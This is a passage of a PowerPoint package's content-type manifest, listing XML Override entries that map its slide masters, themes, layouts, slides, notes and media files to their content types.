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44.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster9.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster7.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster42.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster27.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster13.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45.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster10.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster5.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster40.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster11.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster6.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster41.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster26.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster14.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster15.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster16.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster17.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster18.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster20.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster19.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster21.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster22.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster23.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster24.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster25.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster1.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster12.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster32.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster33.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster34.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster35.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster36.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster37.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster38.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster39.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster31.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster29.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster8.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster43.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster30.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/_rels/slideMaster28.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster25.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster21.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18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster26.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40.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster39.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31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster29.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster43.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster30.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster28.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster5.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Masters/slideMaster10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster45.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster27.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster13.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster44.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/>
  <Override PartName="/ppt/theme/theme29.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme28.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme27.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme26.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme25.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme24.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme23.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme22.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme21.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18.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme17.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme16.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme15.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme14.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40.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme39.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme41.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme36.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme9.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme45.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme10.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theme/theme46.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme11.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme8.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme35.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme7.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme34.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme6.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme33.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme5.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme32.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme4.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme31.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme13.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme3.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme30.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme12.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/_rels/presentation.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/media/image28.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image18.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image25.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image3.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image30.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image27.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image24.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image22.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image11.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image9.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image10.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image7.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image8.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image12.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image35.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image21.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image31.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image5.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image29.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image36.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image4.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image13.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image32.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image6.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image37.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image2.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image34.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image15.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image33.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image1.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image14.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image16.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image19.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image23.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image17.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image20.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image26.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embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/slideLayouts/slideLayout22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout4.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout12.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout5.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout13.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout26.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout6.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout1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27.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout7.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout15.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout28.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout8.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout16.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout30.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout25.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout36.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout24.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout39.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout41.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout35.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout23.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout18.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1.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout21.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout34.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout22.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40.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32.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45.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout2.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout10.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout31.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout29.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout9.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slideLayouts/_rels/slideLayout17.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+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1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2.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32.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout44.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout33.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout45.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+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xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/_rels/slide50.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide45.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide44.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide43.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide42.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide41.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide28.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide65.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide29.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide1.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide55.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xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide56.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide10.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide47.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide17.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide54.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide16.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide53.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57.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide18.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide60.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide52.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide51.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide48.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide11.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide46.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide62.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide64.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide27.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide15.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide61.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide19.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide63.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide14.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4.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide21.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide58.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide12.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide49.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide5.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide22.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide59.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide13.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35.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide36.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide37.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide38.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide39.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide40.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+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18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide60.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide57.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide48.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47.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46.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide29.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide65.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide28.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide62.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide64.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide27.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61.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide19.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide63.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49.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide58.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59.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0.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide39.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide40.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide38.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide37.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide24.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide59.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
